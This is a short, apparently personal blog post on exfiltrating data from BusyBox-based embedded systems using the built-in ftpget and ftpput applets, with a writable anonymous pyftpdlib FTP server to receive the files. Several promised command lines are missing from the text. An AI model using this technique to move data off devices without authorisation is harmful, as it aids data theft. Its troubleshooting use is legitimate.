This is a super quick post on a simple method to exfiltrate data from systems running BusyBox , a shell commonly used on embedded devices. Such systems often lack common tools, presenting a challenge when you need to move data about. When I first looked into this topic I found solutions which were too specific or complex, so I hope this post is useful.
The BusyBox man page lists commonly available commands, which currently include *deep breath*:
[/code] Spot anything interesting? The commands ftpget and ftpput should stand out, and they do exactly what you'd expect. Note that there may not be a symlink to the commands on a given system even if they're compiled into BusyBox - if running ftpput returns "not found" try busybox ftpput to access the command (the applet in BusyBox parlance).
Listening for files
All you need now is a listening FTP server. Any will do, but I found pyftpdlib - an "extremely fast Python FTP server" - perfect for this purpose. To get it working, install the library on your server (most distros have a package) then fire it up in the directory where you want to send or receive files like this:
python3 -m pyftpdlib -w
By default the server listens on port 2121, which can be changed with the -p flag. The -w flag tells the module to allow files to be written. Presto, a working anonymous FTP server! For more options, run the module with the -h option.
To send files from the BusyBox instance to your server, you can now run:
Similarly, you can get files from your server by running:
Note: As pointed out over on Hacker News the nc command is also a nice option, however not all commands are always compiled in and I've found ftpget and ftpget more commonly available, perhaps due to the ubiquity of FTP.